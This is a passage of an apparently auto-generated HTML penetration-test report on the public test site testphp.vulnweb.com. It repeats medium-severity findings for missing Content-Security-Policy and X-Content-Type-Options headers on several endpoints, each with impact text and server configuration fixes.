+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/ does not implement a Content Security Policy (CSP) header, leaving it vulnerable to various client-side attacks. Content Security Policy is a security mechanism that helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks by defining which sources of content are considered trustworthy. During the penetration test, HTTP responses were analyzed and confirmed to lack the &#39;Content-Security-Policy&#39; header entirely.
+
+Without CSP implementation, the application cannot control which resources (scripts, stylesheets, images, etc.) the browser is allowed to load and execute. This creates an opportunity for attackers to inject malicious content through various vectors such as reflected or stored XSS vulnerabilities. The absence of CSP also prevents the application from leveraging modern browser security features that could mitigate exploitation of other vulnerabilities that may exist within the application.
+
+The missing CSP header represents a defense-in-depth security control gap that could amplify the impact of other client-side vulnerabilities. While not directly exploitable on its own, this missing security header reduces the application&#39;s resilience against common web application attacks and fails to provide users with the additional protection that modern browsers can offer.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy primarily increases the application&#39;s susceptibility to client-side attacks and reduces the effectiveness of browser-based security controls. If other vulnerabilities such as XSS exist within the application, the lack of CSP makes exploitation significantly easier and more impactful. Attackers could potentially execute arbitrary JavaScript code, steal session tokens or sensitive data, perform actions on behalf of users, or redirect users to malicious websites.
+
+From a business perspective, successful exploitation of client-side vulnerabilities could lead to account takeovers, data theft, financial fraud, or reputational damage. The impact is particularly concerning for applications handling sensitive data such as personal information, financial records, or authentication credentials. Additionally, organizations subject to compliance requirements such as PCI-DSS, GDPR, or HIPAA may face regulatory scrutiny for failing to implement reasonable security measures like CSP, especially if a security incident occurs that could have been mitigated by proper CSP implementation.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Header**: Add a comprehensive CSP header to all HTTP responses. Start with a restrictive policy and gradually relax as needed:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Server Configuration Examples**:
+   - **Apache**: Add to .htaccess or virtual host configuration:
+     ```apache
+     Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot;
+     ```
+   - **Nginx**: Add to server block:
+     ```nginx
+     add_header Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot; always;
+     ```
+   - **Application Level (PHP)**: Add to application code:
+     ```php
+     header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;&quot;);
+     ```
+
+3. **CSP Directive Recommendations**:
+   - Use &#39;self&#39; for trusted same-origin resources
+   - Avoid &#39;unsafe-inline&#39; and &#39;unsafe-eval&#39; when possible
+   - Implement nonces or hashes for inline scripts/styles
+   - Use &#39;strict-dynamic&#39; for modern browsers with nonce-based policies
+   - Set &#39;frame-ancestors&#39; to prevent clickjacking
+
+4. **Implementation Strategy**:
+   - Deploy CSP in report-only mode first using &#39;Content-Security-Policy-Report-Only&#39;
+   - Monitor violation reports to identify legitimate resources
+   - Gradually tighten policy and switch to enforcement mode
+   - Regularly review and update CSP directives as application changes
+
+5. **Additional Security Headers**: Implement complementary security headers:
+   - X-Frame-Options: DENY or SAMEORIGIN
+   - X-Content-Type-Options: nosniff
+   - Referrer-Policy: strict-origin-when-cross-origin
+   - Permissions-Policy for feature control</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/Mod_Rewrite_Shop/</p>
+                    <p><strong>Description:</strong> The application at http://testphp.vulnweb.com/Mod_Rewrite_Shop/ is missing the X-Content-Type-Options security header. This header was introduced to prevent MIME type confusion attacks by instructing browsers to strictly adhere to the MIME type specified in the Content-Type header rather than performing content sniffing. Without this header, browsers may attempt to guess the content type of responses based on the content itself, potentially leading to security vulnerabilities.
+
+During testing, HTTP responses from the affected endpoint were observed to lack the &#39;X-Content-Type-Options: nosniff&#39; header. This configuration allows browsers to perform MIME sniffing, which can be exploited by attackers to bypass security controls. For example, an attacker could upload a file with a benign extension but malicious content, and if the browser misinterprets the MIME type, it could execute the malicious content in an unintended context.
+
+The vulnerability was identified through automated security header analysis during the penetration test, where the absence of this critical security header was flagged as a potential security risk that could facilitate more sophisticated attacks against application users.</p>
+                    <p><strong>Impact:</strong> The primary risk associated with missing X-Content-Type-Options header is the potential for MIME type confusion attacks. Attackers could exploit this to bypass content security policies, execute malicious scripts in unexpected contexts, or facilitate cross-site scripting (XSS) attacks. In scenarios where user-generated content is served, attackers might upload files with misleading extensions that browsers incorrectly interpret as executable content.
+
+The business impact includes potential compromise of user sessions, unauthorized access to sensitive data, and reputation damage from successful attacks. While this vulnerability alone may not lead to immediate system compromise, it significantly reduces the application&#39;s defense-in-depth posture and can be chained with other vulnerabilities to amplify attack impact. Organizations in regulated industries may face compliance violations, as security header implementation is often required by standards such as PCI-DSS for applications handling payment data.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Configure the web server or application to include the &#39;X-Content-Type-Options: nosniff&#39; header in all HTTP responses. This can be implemented at various levels:
+
+   **Apache Configuration (.htaccess or virtual host):**
+   ```apache
+   Header always set X-Content-Type-Options &quot;nosniff&quot;
+   ```
+
+   **Nginx Configuration:**
+   ```nginx
+   add_header X-Content-Type-Options &quot;nosniff&quot; always;
+   ```
+
+   **Application-Level (PHP example):**
+   ```php
+   header(&#39;X-Content-Type-Options: nosniff&#39;);
+   ```
+
+2. **Implement Comprehensive Security Headers**: Deploy additional security headers as part of a defense-in-depth strategy, including Content-Security-Policy, X-Frame-Options, and Strict-Transport-Security headers.
+
+3. **Content-Type Validation**: Ensure all responses include appropriate Content-Type headers that accurately reflect the content being served. Implement server-side validation of file uploads and content types.
+
+4. **Regular Security Header Audits**: Establish automated testing to verify the presence and correct configuration of security headers across all application endpoints. Consider using tools like SecurityHeaders.com or integrating header checks into CI/CD pipelines.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/Mod_Rewrite_Shop/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/Mod_Rewrite_Shop/ lacks a Content Security Policy (CSP) header implementation. During the assessment, HTTP response analysis revealed the complete absence of the &#39;Content-Security-Policy&#39; header in server responses. This security control omission was identified through automated header analysis and manual verification of multiple endpoints within the application.
+
+Content Security Policy is a critical browser security mechanism that helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks by declaring which dynamic resources are allowed to load. Without CSP implementation, the application cannot leverage this important defense-in-depth security layer, leaving users vulnerable to various client-side attacks. The missing CSP header indicates that the application has not implemented proper security headers configuration, which is a fundamental security hardening requirement.
+
+In the context of this e-commerce application (Mod_Rewrite_Shop), the absence of CSP is particularly concerning as such applications typically handle sensitive user data, payment information, and authentication credentials. The lack of CSP combined with potential XSS vulnerabilities could allow attackers to inject malicious scripts that execute with full privileges in the user&#39;s browser context.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy creates multiple attack vectors that could compromise user security and business operations. Attackers could exploit this weakness in conjunction with XSS vulnerabilities to inject malicious scripts that steal user credentials, session tokens, payment card information, or personal data. In an e-commerce context, this could lead to fraudulent transactions, account takeovers, and significant financial losses for both customers and the business.
+
+The most severe impact scenarios include: unauthorized access to customer accounts and payment information, injection of malicious content that could damage brand reputation, compliance violations under PCI-DSS requirements (which mandate secure transmission and processing of cardholder data), and potential GDPR violations if personal data is compromised. Additionally, the lack of CSP makes the application more susceptible to clickjacking attacks, where malicious sites could embed the application in hidden frames to trick users into performing unintended actions. From a business perspective, successful exploitation could result in regulatory fines, loss of customer trust, legal liability, and significant remediation costs.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Headers**: Configure the web server or application to include appropriate CSP headers in all HTTP responses. Start with a restrictive policy and gradually refine it based on application requirements. Example implementation:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Use CSP Report-Only Mode for Testing**: Before enforcing CSP, implement it in report-only mode to identify potential issues without breaking functionality:
+   ```
+   Content-Security-Policy-Report-Only: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+3. **Server-Level Configuration**: Implement CSP headers at the web server level (Apache, Nginx, IIS) to ensure consistent application across all endpoints. For Apache:
+   ```
+   Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot;
+   ```
+
+4. **Application-Level Implementation**: Add CSP headers programmatically in application code. For PHP applications:
+   ```php
+   header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;&quot;);
+   ```
+
+5. **Implement CSP Reporting**: Set up a reporting endpoint to monitor CSP violations and refine the policy over time. This helps identify legitimate resources that may be blocked and potential attack attempts.
+
+6. **Regular Policy Review**: Establish a process to regularly review and update CSP policies as application functionality evolves, ensuring the policy remains effective without hindering legitimate operations.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/hpp/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/hpp/ is missing the X-Content-Type-Options security header. This header is crucial for preventing MIME type sniffing attacks where browsers attempt to determine the content type of a resource by examining its content rather than relying solely on the Content-Type header provided by the server. During the security assessment, HTTP response headers were analyzed and the absence of &#39;X-Content-Type-Options: nosniff&#39; was confirmed.
+
+Without this header, malicious actors can exploit browser behavior by uploading files with misleading extensions or content types. For example, an attacker could upload a JavaScript file disguised as an image, and if the browser performs MIME sniffing, it may execute the malicious script instead of treating it as an image. This vulnerability is particularly concerning in applications that allow file uploads or serve user-generated content, as it can lead to cross-site scripting (XSS) attacks and other client-side code execution scenarios.
+
+The vulnerable endpoint demonstrates this security misconfiguration by not implementing proper HTTP security headers, leaving users susceptible to content type confusion attacks when interacting with the application.</p>
+                    <p><strong>Impact:</strong> The absence of the X-Content-Type-Options header exposes users to MIME type confusion attacks, which can lead to cross-site scripting (XSS) vulnerabilities and unauthorized script execution. Attackers could potentially upload malicious files disguised as benign content types, which browsers might then execute as JavaScript or other executable content. This could result in session hijacking, credential theft, defacement of the web application, or execution of malicious actions on behalf of authenticated users. In enterprise environments, this vulnerability could compromise user accounts, lead to data exfiltration, and damage the organization&#39;s reputation. From a compliance perspective, this security gap may violate requirements under frameworks such as PCI-DSS (which mandates secure coding practices), GDPR (regarding data protection by design), and various industry-specific regulations that require implementation of appropriate technical security measures.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Configure X-Content-Type-Options Header**: Add the following header to all HTTP responses: &#39;X-Content-Type-Options: nosniff&#39;. This can be implemented at the web server level (Apache/Nginx), application level, or through a Web Application Firewall (WAF).
+
+2. **Web Server Configuration Examples**:
+   - **Apache**: Add &#39;Header always set X-Content-Type-Options nosniff&#39; to httpd.conf or .htaccess
+   - **Nginx**: Add &#39;add_header X-Content-Type-Options nosniff always;&#39; to nginx.conf
+   - **IIS**: Add &#39;&lt;add name=&quot;X-Content-Type-Options&quot; value=&quot;nosniff&quot; /&gt;&#39; to web.config customHeaders section
+
+3. **Application-Level Implementation**: Ensure the application framework sets this header programmatically. For PHP applications, use: &#39;header(&quot;X-Content-Type-Options: nosniff&quot;);&#39;. For Node.js with Express: &#39;app.use(helmet.noSniff());&#39;
+
+4. **Implement Content Security Policy (CSP)**: Deploy a comprehensive CSP header to provide additional protection against XSS and code injection attacks: &#39;Content-Security-Policy: default-src \&#39;self\&#39;; script-src \&#39;self\&#39; \&#39;unsafe-inline\&#39;; object-src \&#39;none\&#39;;&#39;
+
+5. **Regular Security Header Audit**: Implement automated testing to verify the presence of all security headers across the application. Use tools like Security Headers (securityheaders.com) or integrate header validation into CI/CD pipelines.
+
+6. **File Upload Security**: If the application handles file uploads, implement strict file type validation, rename uploaded files, store them outside the web root, and serve them with appropriate Content-Type headers.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/hpp/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/hpp/ does not implement a Content Security Policy (CSP) header, as evidenced by the complete absence of the &#39;Content-Security-Policy&#39; directive in HTTP responses. CSP is a crucial security mechanism that helps prevent cross-site scripting (XSS), data injection attacks, and other code injection vulnerabilities by defining trusted sources for content execution and loading.
+
+Without CSP implementation, the application is vulnerable to various client-side attacks including XSS, clickjacking, and malicious content injection. Attackers can exploit this absence to inject and execute arbitrary JavaScript code, load malicious resources from external domains, or perform other client-side attacks that could compromise user data and application integrity. The lack of CSP represents a fundamental gap in the application&#39;s defense-in-depth security strategy.
+
+This vulnerability was identified through HTTP response analysis during security testing, where manual inspection and automated tools confirmed the complete absence of Content-Security-Policy headers across the application endpoints, including the specifically tested /hpp/ directory.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy significantly increases the application&#39;s attack surface and exposes users to multiple security risks. Attackers could exploit this gap to execute stored or reflected XSS attacks with greater success rates, as there are no browser-enforced restrictions on script execution or resource loading. This could lead to session hijacking, credential theft, unauthorized actions performed on behalf of users, and data exfiltration.
+
+From a business perspective, successful exploitation could result in customer data breaches, financial fraud, reputational damage, and potential regulatory violations. Organizations subject to compliance frameworks such as PCI-DSS, GDPR, or HIPAA may face additional scrutiny, as the absence of fundamental security controls like CSP demonstrates inadequate security posture. The lack of CSP also makes the application more susceptible to advanced persistent threats and targeted attacks that rely on client-side code execution.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Headers**: Configure the web server or application framework to include appropriate CSP headers in all HTTP responses. Start with a restrictive policy and gradually relax as needed:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Use CSP Report-Only Mode Initially**: Deploy CSP in report-only mode first to identify potential issues without breaking functionality:
+   ```
+   Content-Security-Policy-Report-Only: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+3. **Framework-Specific Implementation**: For PHP applications, add CSP headers using header() function or web server configuration:
+   ```php
+   // PHP implementation
+   header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;&quot;);
+   ```
+   
+   For Apache servers, add to .htaccess or virtual host configuration:
+   ```apache
+   Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot;
+   ```
+
+4. **Implement CSP Monitoring**: Set up a reporting endpoint to monitor CSP violations and adjust policies accordingly. This helps identify legitimate resources that need to be whitelisted and potential attack attempts.
+
+5. **Regular Policy Review**: Establish a process to regularly review and update CSP policies as the application evolves, ensuring new features and third-party integrations are properly accommodated while maintaining security posture.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 3.7</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=1</p>
+                    <p><strong>Description:</strong> The application fails to implement the X-Content-Type-Options security header on the endpoint http://testphp.vulnweb.com/listproducts.php?cat=1. This header is designed to prevent MIME type sniffing attacks by instructing browsers to strictly interpret the declared Content-Type header rather than attempting to guess the content type based on the response body. Without this protection, browsers may interpret responses in unexpected ways, potentially leading to security vulnerabilities.
+
+MIME type sniffing (also known as content sniffing) occurs when browsers ignore the declared Content-Type and instead analyze the response content to determine how it should be processed. This behavior can be exploited by attackers who can control response content, allowing them to inject malicious scripts or content that gets executed in unintended contexts. The missing X-Content-Type-Options header leaves the application vulnerable to these attacks, particularly in scenarios where user-controlled content is reflected in responses.
+
+In the context of this PHP application, the absence of this security header means that if an attacker can influence the response content (through file uploads, user-generated content, or other input mechanisms), they may be able to craft responses that browsers will interpret as executable content despite being served with non-executable MIME types.</p>
+                    <p><strong>Impact:</strong> The missing X-Content-Type-Options header creates a medium-risk security exposure that could facilitate various client-side attacks. The primary risk involves MIME confusion attacks where malicious content disguised as benign file types (such as images or text files) could be interpreted and executed as JavaScript or HTML by browsers performing content sniffing. This could lead to cross-site scripting (XSS) attacks, particularly in applications that allow file uploads or serve user-controlled content.
+
+From a business perspective, successful exploitation could result in unauthorized access to user sessions, theft of sensitive information including authentication cookies and personal data, and potential compromise of user accounts. In e-commerce applications like the affected site, this could lead to unauthorized transactions, exposure of customer payment information, and significant reputational damage. The vulnerability may also impact compliance with security standards such as PCI-DSS, which requires adequate protection of cardholder data, and privacy regulations like GDPR that mandate appropriate technical safeguards for personal data processing.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Add the X-Content-Type-Options header with the value &#39;nosniff&#39; to all HTTP responses. In PHP applications, this can be implemented globally by adding the following code to a common header file or application bootstrap:
+
+```php
+header(&#39;X-Content-Type-Options: nosniff&#39;);
+```
+
+2. **Web Server Configuration**: Configure the web server to automatically add the header for all responses. For Apache, add the following to .htaccess or virtual host configuration:
+
+```apache
+Header always set X-Content-Type-Options &quot;nosniff&quot;
+```
+
+For Nginx, add this to the server block:
+
+```nginx
+add_header X-Content-Type-Options &quot;nosniff&quot; always;
+```
+
+3. **Framework-Level Implementation**: If using a PHP framework, implement the header through middleware or security configuration. For example, in Laravel, add it to the middleware or use the built-in security headers package.
+
+4. **Content Security Policy**: Implement a comprehensive Content Security Policy (CSP) as an additional layer of protection against content injection attacks. This works synergistically with X-Content-Type-Options to prevent various client-side attacks.
+
+5. **Input Validation and Output Encoding**: Ensure all user inputs are properly validated and outputs are encoded to prevent injection attacks that could be facilitated by MIME type confusion.
+
+6. **Regular Security Header Auditing**: Implement automated testing to verify that all security headers, including X-Content-Type-Options, are present on all application responses.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=1</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/listproducts.php?cat=1 lacks a Content Security Policy (CSP) header implementation. Content Security Policy is a critical security mechanism that helps prevent cross-site scripting (XSS) attacks, clickjacking, and other code injection attacks by controlling which resources the browser is allowed to load for a given page. During the security assessment, it was observed that the HTTP response headers do not include the &#39;Content-Security-Policy&#39; directive, leaving the application vulnerable to various client-side attacks.
+
+Without CSP implementation, the application cannot effectively mitigate XSS attacks, as there are no restrictions on inline scripts, external resource loading, or dynamic code execution. This creates a permissive environment where malicious scripts injected through other vulnerabilities (such as reflected or stored XSS) can execute without restriction. The absence of CSP represents a defense-in-depth failure that significantly increases the impact of any existing or future XSS vulnerabilities.
+
+The specific endpoint tested (listproducts.php) appears to be a product listing page that likely renders dynamic content, making it a prime candidate for XSS attacks if other input validation weaknesses exist. The lack of CSP means that any successful XSS payload would have unrestricted access to perform actions such as stealing cookies, accessing local storage, making arbitrary HTTP requests, or redirecting users to malicious sites.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy creates several significant security risks. Primarily, it amplifies the impact of any XSS vulnerabilities that may exist in the application by allowing unrestricted script execution, enabling attackers to steal session cookies, access sensitive user data, or perform actions on behalf of legitimate users. Without CSP, attackers can also conduct clickjacking attacks by embedding the application in malicious iframes, potentially tricking users into performing unintended actions.
+
+From a business perspective, successful exploitation could lead to account takeover, unauthorized transactions, data theft, and reputation damage. The vulnerability particularly affects user trust and could result in financial losses if customer data is compromised. Additionally, organizations subject to compliance requirements such as PCI-DSS (for payment processing) or GDPR (for EU user data) may face regulatory penalties, as CSP implementation is considered a security best practice for protecting user data and preventing unauthorized access to sensitive information.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Header**: Add a comprehensive CSP header to all web application responses. Start with a restrictive policy and gradually relax as needed:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;unsafe-eval&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39; https:; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Server Configuration**: Configure the web server to automatically include CSP headers. For Apache, add to .htaccess or virtual host configuration:
+   ```apache
+   Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:;&quot;
+   ```
+   For Nginx:
+   ```nginx
+   add_header Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:;&quot; always;
+   ```
+
+3. **Application-Level Implementation**: If using PHP, add CSP headers programmatically:
+   ```php
+   header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:;&quot;);
+   ```
+
+4. **CSP Reporting**: Implement CSP violation reporting to monitor and refine the policy:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+5. **Gradual Implementation**: Start with &#39;Content-Security-Policy-Report-Only&#39; header to test the policy without breaking functionality, then transition to enforcing mode after validation.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 3.7</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/search.php?test=1</p>
+                    <p><strong>Description:</strong> The application is missing the X-Content-Type-Options security header at the endpoint http://testphp.vulnweb.com/search.php?test=1. This header prevents browsers from performing MIME type sniffing, which can lead to security vulnerabilities when browsers incorrectly interpret file types based on content rather than the declared Content-Type header. The absence of this header was confirmed through HTTP response analysis showing &#39;X-Content-Type-Options: Not set&#39;.
+
+Without the X-Content-Type-Options header set to &#39;nosniff&#39;, browsers may attempt to guess the MIME type of served content, potentially executing malicious scripts or interpreting files in unexpected ways. This is particularly dangerous when user-uploaded content is served or when the application handles various file types that could be misinterpreted by the browser.
+
+In the context of this search functionality, the missing header could allow attackers to exploit MIME confusion attacks, especially if the search results include user-controlled content or file downloads. This vulnerability becomes more critical when combined with file upload functionality or when serving dynamic content that could be manipulated by attackers.</p>
+                    <p><strong>Impact:</strong> The missing X-Content-Type-Options header could allow attackers to exploit MIME type confusion vulnerabilities, potentially leading to cross-site scripting (XSS) attacks through content sniffing. An attacker could upload or inject content that appears benign but is interpreted by browsers as executable JavaScript, bypassing content type restrictions. This could result in session hijacking, credential theft, or unauthorized actions performed on behalf of legitimate users.
+
+In enterprise environments, this vulnerability could facilitate targeted phishing attacks or malware distribution through seemingly legitimate file downloads. The impact is amplified in applications handling sensitive data or financial transactions, where successful exploitation could lead to data breaches or regulatory compliance violations under frameworks such as PCI-DSS, GDPR, or SOX. While not directly exposing data, this vulnerability creates an attack vector that can be chained with other vulnerabilities to achieve more significant compromise.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Add the following header to all HTTP responses: &#39;X-Content-Type-Options: nosniff&#39;. This can be implemented at the application level, web server configuration, or through a reverse proxy.
+
+2. **Web Server Configuration Examples**:
+   - **Apache**: Add &#39;Header always set X-Content-Type-Options nosniff&#39; to .htaccess or virtual host configuration
+   - **Nginx**: Add &#39;add_header X-Content-Type-Options nosniff always;&#39; to server block
+   - **IIS**: Add &#39;&lt;add name=&quot;X-Content-Type-Options&quot; value=&quot;nosniff&quot; /&gt;&#39; to web.config customHeaders section
+
+3. **Application-Level Implementation**: For PHP applications, add &#39;header(&#39;X-Content-Type-Options: nosniff&#39;);&#39; before any content output. Ensure this is implemented globally through a common header function or framework middleware.
+
+4. **Content Security Policy Enhancement**: Implement a comprehensive Content Security Policy (CSP) as an additional layer of protection against content injection attacks. Example: &#39;Content-Security-Policy: default-src \&#39;self\&#39;; script-src \&#39;self\&#39; \&#39;unsafe-inline\&#39;; object-src \&#39;none\&#39;;&#39;
+
+5. **Regular Security Header Audit**: Implement automated testing to verify the presence of all security headers across the application. Consider using tools like security header scanners in CI/CD pipelines to prevent regression.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/search.php?test=1</p>
+                    <p><strong>Description:</strong> The application at http://testphp.vulnweb.com/search.php?test=1 does not implement a Content Security Policy (CSP) header, as evidenced by the complete absence of the &#39;Content-Security-Policy&#39; header in HTTP responses. CSP is a critical browser security mechanism that helps prevent code injection attacks such as Cross-Site Scripting (XSS) by allowing web applications to specify which sources of content are considered trustworthy.
+
+Without CSP protection, the application is vulnerable to various client-side attacks where malicious scripts could be injected and executed within the context of the application. This creates an environment where attackers can more easily exploit other vulnerabilities like reflected or stored XSS, as there are no browser-level restrictions on script execution, inline styles, or resource loading from external domains.
+
+The missing CSP header represents a failure to implement defense-in-depth security controls, leaving users vulnerable to content injection attacks that could have been mitigated or prevented entirely with proper CSP implementation. This is particularly concerning for applications that handle user input or display user-generated content.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy creates several security risks that could lead to compromise of user data and application integrity. Attackers could more easily exploit XSS vulnerabilities to steal session cookies, perform actions on behalf of users, redirect users to malicious sites, or inject malicious content such as cryptocurrency miners or phishing forms. In the worst-case scenario, successful exploitation could lead to complete account takeover, theft of sensitive personal information, financial fraud, or malware distribution to application users.
+
+From a compliance perspective, the lack of adequate security controls may violate requirements under regulations such as PCI-DSS (which mandates protection against common web application vulnerabilities), GDPR (which requires appropriate technical measures to protect personal data), and various industry standards that require defense-in-depth security implementations. Organizations may face regulatory fines, loss of customer trust, and reputational damage if user data is compromised due to preventable client-side attacks.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Headers**: Add a comprehensive CSP header to all HTTP responses. Start with a restrictive policy and gradually relax as needed:
+   ```
